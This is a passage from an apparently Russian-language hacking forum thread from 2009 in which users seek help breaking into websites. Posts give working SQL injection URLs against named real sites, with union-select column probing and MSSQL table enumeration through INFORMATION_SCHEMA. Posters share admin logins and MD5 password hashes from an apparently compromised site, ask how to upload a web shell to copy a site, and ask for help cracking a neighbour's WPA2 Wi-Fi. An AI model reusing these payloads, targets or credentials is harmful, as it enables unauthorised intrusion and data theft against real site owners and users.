Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. l1ght

    l1ght Elder - Старейшина

    Joined:
    5 Dec 2006
    Messages:
    191
    Likes Received:
    678
    Reputations:
    333
    без протокола религия не позволяет?=) как вариант echo uploader > file
     
  2. pingvit

    pingvit New Member

    Joined:
    10 Mar 2008
    Messages:
    27
    Likes Received:
    1
    Reputations:
    0
    Пароль админа в исходном тексте:
    admin:21232f297a57a5a743894a0e4a801fc3
    т.е admin:admin

    админку долго не искал:
    Не пойму, почему залогиниться не могу?
     
  3. S[N]EP

    S[N]EP Elder - Старейшина

    Joined:
    29 Aug 2008
    Messages:
    102
    Likes Received:
    28
    Reputations:
    10
    А что делать если при пхп иньекции фильтруются все символы просто убераются((
    ?act=(d,z.s:skfds) - выведет dzsskfds / а если ввести ?act=(d,z.s:s#kfds) - то только dzss обьясните такую странность)
     
  4. -m0rgan-

    -m0rgan- Elder - Старейшина

    Joined:
    29 Sep 2008
    Messages:
    514
    Likes Received:
    170
    Reputations:
    17
    Поищи другие таблицы, ибо не исключено,что этот логин/пасс не от админки...
     
    1 person likes this.
  5. pinky07

    pinky07 Member

    Joined:
    2 Jan 2009
    Messages:
    55
    Likes Received:
    34
    Reputations:
    6
    pingvit там есть таблица pmr_admins , скорее всего там как раз и хряняться логин с пассом админки, вот логин: admin, вот md5 хэш пароля: 08913870713a4b932d796e47ccaebe8c
    P.S. там ещё есть таблицы jos_users, phpbb_users, pmr_users но это все не то...
     
    #5525 pinky07, 20 Feb 2009
    Last edited: 20 Feb 2009
  6. joomler

    joomler Member

    Joined:
    19 Feb 2009
    Messages:
    25
    Likes Received:
    5
    Reputations:
    3
    Привет всем)
    у меня проблемка. Есть доступ в админку на сайте, я хотел было залить шелл туда но там нет таких полей(ни чего туда не загрузить кроме текста копи-паст, который отправляется в базу)
    Мне бы хотелось рипнуть сайт, но как туда залить шелл? или может еще как то можно?
    пробовал скуль иньект выдает это: Table 'kalinov_refer.passwords' doesn't exist
    может как то скуль надо раскрутить?
     
  7. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    joomler отвлекись ненадолго от компа, и подумай какого ответа ты сдесь ждёшь?

    Вот просто , как , по твоему, на твой вопрос можно ответить? Ни сайта, ни даже названия движка ты не привёл, что там в твоей админке никто не знает, скуль? ну разумеется через скуль можно залиться, при соблюдении определённых условий, которые кстати перечислены в обзоре, линк на который ,в свою очередь, тебе давали выше.

    Подвязывай заниматься ерундой, и почитай статьи на форуме. И многое станет ясно, а такими вопросами ты себе знаний не добавишь
     
  8. joomler

    joomler Member

    Joined:
    19 Feb 2009
    Messages:
    25
    Likes Received:
    5
    Reputations:
    3
    jokester да наверное поторопился, надо почитать сначало на форуме согласен, но хочется то все и сразу)))))
    Исправляю ошибки: 1) Что за движек я так и не понял , возможно он самописный
    2) Вот сайт и уязвимый скрипт:
    http://referats-online.ru/catalog_44.html?pid=44+union+select+1+from+user 3) В админке кроме редактирования статей и новостей больше ни чего нет. http://referats-online.ru/admin
    Логин: 1
    Пароль: 1

    Ну теперь пойду почитаю топики)))
     
  9. _Zeus_

    _Zeus_ New Member

    Joined:
    18 Feb 2009
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    Я вот нашел такое:
    http://devicebondage.stockroom.com/category.aspx?category_id=196'
    а что с ним делать?
     
  10. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    _Zeus_, это mssql-inj. почитай статьи, и попробуй докрутить.
    кстати, очень удобная скуля для новичка, я в свое время на такой же тренировался.
     
    _________________________
    #5530 yarbabin, 21 Feb 2009
    Last edited: 21 Feb 2009
  11. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    Никакая это не mysql.

    Это MSSQL.

    Code:
    http://devicebondage.stockroom.com/category.aspx?category_id=196%20or%201=@@version
    Читаем это:

    http://forum.antichat.ru/thread30501.html
     
    #5531 R1dex, 21 Feb 2009
    Last edited: 21 Feb 2009
  12. Assembler

    Assembler Elder - Старейшина

    Joined:
    1 Sep 2007
    Messages:
    173
    Likes Received:
    102
    Reputations:
    23
    Решил попробовать =) MSSQL
    http://devicebondage.stockroom.com/category.aspx?category_id=196%20or%201=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES)
    Выдает STORE_USER_ASSN
    Дальше через Not in но чета не получается, в чем ошибка?
    category_id=196 or 1=(SELECT+TOP+1+TABLE_NAME+FROM+IN FORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+(' STORE_USER_ASSN'))--
     
  13. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    WebKnight Application Firewall Alert



    AQTRONIX WebKnight is an application firewall for web servers and is released under the GNU General Public License. It is an ISAPI filter for securing web servers by blocking certain requests. If an alert is triggered WebKnight will take over and protect the web server.

    возможно фаер блокирует остальные запросы
     
  14. _Zeus_

    _Zeus_ New Member

    Joined:
    18 Feb 2009
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    Да ну, я не верю, что здесь ничего нельзя сделать.
    Невозможного не бывает. Жаль, что я в этом нечего почти не понимаю.
     
  15. geezer.code

    geezer.code Elder - Старейшина

    Joined:
    22 Jan 2007
    Messages:
    552
    Likes Received:
    358
    Reputations:
    90
    фильтруется киворд WHERE
     
  16. AkyHa_MaTaTa

    AkyHa_MaTaTa Elder - Старейшина

    Joined:
    19 Mar 2007
    Messages:
    557
    Likes Received:
    306
    Reputations:
    27
    Можно было бы попробывать having но group by и having также фильтруеться.
     
    #5536 AkyHa_MaTaTa, 21 Feb 2009
    Last edited: 21 Feb 2009
    1 person likes this.
  17. l1ght

    l1ght Elder - Старейшина

    Joined:
    5 Dec 2006
    Messages:
    191
    Likes Received:
    678
    Reputations:
    333
    и подводя итоги:
     
    4 people like this.
  18. Ghosttt

    Ghosttt Elder - Старейшина

    Joined:
    29 Dec 2007
    Messages:
    29
    Likes Received:
    10
    Reputations:
    0
    ПРивет всем =)
    Может хтото может мне помоч буду очень признателен =)
    Проблема у меня слудующая ... у меня в квартире есть сигнал wi fі офиса которий по соседству но там стоит пароль (((
    Мне нужно както узнать пароль доступа... какой прогой ето можно сделать бистрее и безопасней =)
    КОд безопасності там в шифровке wра2
     
  19. $n@ke

    $n@ke Elder - Старейшина

    Joined:
    18 Sep 2006
    Messages:
    696
    Likes Received:
    404
    Reputations:
    134

    темой ошибся

    http://forum.antichat.ru/forum113.html
     
  20. [JavaScript]

    [JavaScript] Member

    Joined:
    14 Feb 2009
    Messages:
    45
    Likes Received:
    22
    Reputations:
    1
    Code:
    http://www.ajjp.org/campaigns/signStatement.php?cid=-15+union+select+1...25
    Дошел до 25... Там так много столбцов?
     
Thread Status:
Not open for further replies.